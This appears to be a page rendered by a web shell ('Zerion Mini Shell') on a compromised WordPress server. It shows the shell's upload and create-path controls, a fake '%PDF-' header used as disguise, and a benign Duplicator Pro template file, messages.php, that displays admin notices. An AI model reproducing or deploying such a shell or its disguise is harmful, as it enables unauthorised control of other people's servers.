%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/businessmultisite/wp-content/plugins/duplicator-pro/template/parts/
Upload File :
Create Path :
Current File : /var/www/businessmultisite/wp-content/plugins/duplicator-pro/template/parts/messages.php

<?php

/**
 * Duplicator messages sections
 *
 * @package Duplicator
 * @copyright (c) 2021, Snapcreek LLC
 *
 */

defined("ABSPATH") or die("");

/**
 * Variables
 * @var \Duplicator\Core\Controllers\ControllersManager $ctrlMng
 * @var \Duplicator\Core\Views\TplMng  $tplMng
 * @var array $tplData
 */
?>
<div class="dup-messages-section" >
    <?php
    if (isset($tplData['errorMessage']) && strlen($tplData['errorMessage']) > 0) {
        DUP_PRO_UI_Notice::displayGeneralAdminNotice(
            $tplData['errorMessage'],
            DUP_PRO_UI_Notice::GEN_ERROR_NOTICE,
            true
        );
    }

    if (DUPLICATOR_PRO_DEBUG_OUTPUT_INVALID && isset($tplData['invalidOutput']) && strlen($tplData['invalidOutput']) > 0) {
        DUP_PRO_UI_Notice::displayGeneralAdminNotice(
            '<b>Invalid output on actions execution</b><hr>' . $tplData['invalidOutput'],
            DUP_PRO_UI_Notice::GEN_ERROR_NOTICE,
            true
        );
    }

    if (isset($tplData['successMessage']) && strlen($tplData['successMessage']) > 0) {
        DUP_PRO_UI_Notice::displayGeneralAdminNotice(
            $tplData['successMessage'],
            DUP_PRO_UI_Notice::GEN_SUCCESS_NOTICE,
            true
        );
    }
    ?>
</div>
<?php
if (false) {
    // for debug
    ?>
    <pre style="font-size: 12px; max-height: 300px; overflow: auto; border: 1px solid black; padding: 10px;"><?php
        var_dump($tplData);
    ?></pre>
    <?php
}

Zerion Mini Shell 1.0